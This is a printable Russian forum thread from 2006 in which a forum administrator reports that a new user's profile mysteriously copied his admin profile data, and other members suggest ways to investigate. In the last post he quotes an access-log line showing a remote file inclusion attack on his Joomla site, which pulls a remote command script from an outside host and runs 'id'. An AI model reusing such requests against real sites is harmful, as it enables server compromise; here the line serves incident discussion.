Strict Standards: Resource ID#30 used as offset, casting to integer (30) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#32 used as offset, casting to integer (32) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#33 used as offset, casting to integer (33) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Версия для печати :: Новый пользователь украл данные из профиля администратора в свой профиль
ТвойWeb » » ExBB Full Mods » Новый пользователь украл данные из профиля администратора в свой профиль

Страниц (1): [1]
 

1. SysteM - 18 Ноября, 2006 - 04:40:48 - перейти к сообщению
На днях на моем форуме появился очередной новый пользователь, и я был шокирован, когда увидел, что в его профиле значится вся информация, которая прописана в моем, то есть админском профиле. Например, дата регистрации - 10.05.05, а не 16.11.06, также прописан мой день рождения, моя подпись, но главное - мое количество постов (682), и распределение этих постов в процентах по разделам форума. Разве что админских прав у пользователя не было. Как это можно объяснить? Была ли это попытка украсть у меня мой профиль с админскими правами? Или просто форум сглючил?

Пользователя я на всякий случай удалил. Форум - FullMods 0.1.4
2. TvoyWeb - 18 Ноября, 2006 - 09:31:15 - перейти к сообщению
SysteM
Интересноа вещь..... я подумаю как такое могло случиться.
3. Валерий - 18 Ноября, 2006 - 10:10:52 - перейти к сообщению
SysteM
Ты поспешил удалить этого пользователя. Нужно было просто заблокировать.
Потом посмотреть его посты. ты ведь самого главного не увидел - что он писал.
Потом - нужно было открыть папку юзеров и там всю инфу глянуть. тот же пароль сравнить с твоим.

А ты сам ничего не перекачивал никуда?
Мне кажется, это не кто-то регился, а просто твой дубль появился некоим образом.
4. SysteM - 18 Ноября, 2006 - 13:28:55 - перейти к сообщению
Пользователь за полтора дня ничего не написал, да и не похоже на простую копию моего профиля, т.к. сам я точно ничего не перекачивал или копировал, и у пользователя был ник и регистрационный е-мейл, отличные от моего.

Пароль на форуме пользователи сами задавать не могут, их генерит сам форум.

Да, удалить может быть и поторопился, но просто буквально позавчера хакнули главную часть этого же сайта, работающую на CMS Joomla - ничего серьезного, просто дефейс главной странички сделали, но все равно теперь я уже настороже.
5. TvoyWeb - 18 Ноября, 2006 - 17:01:17 - перейти к сообщению
SysteM пишет:
но просто буквально позавчера хакнули главную часть этого же сайта

Возможно в это же время и была сделана копия твоего файла.
6. SysteM - 18 Ноября, 2006 - 17:49:38 - перейти к сообщению
Не думаю... Взлом был совершен следующим образом:

CODE:
88.226.0.79 - - [16/Nov/2006:13:32:06 +0300] GET /administrator/components/com_******/********_absolute_path=http://www.nyers.hu/cmd.txt?&list=1&cmd=id


и если заглянуть в файл cmd.txt по ссылке, указанной в куске лога, то не видно никакой связи между форумом ExBB и этим скриптом-взломщиком. Хотя с другой стороны я плохо знаю php, чтобы судить об этом.

Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.0305]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33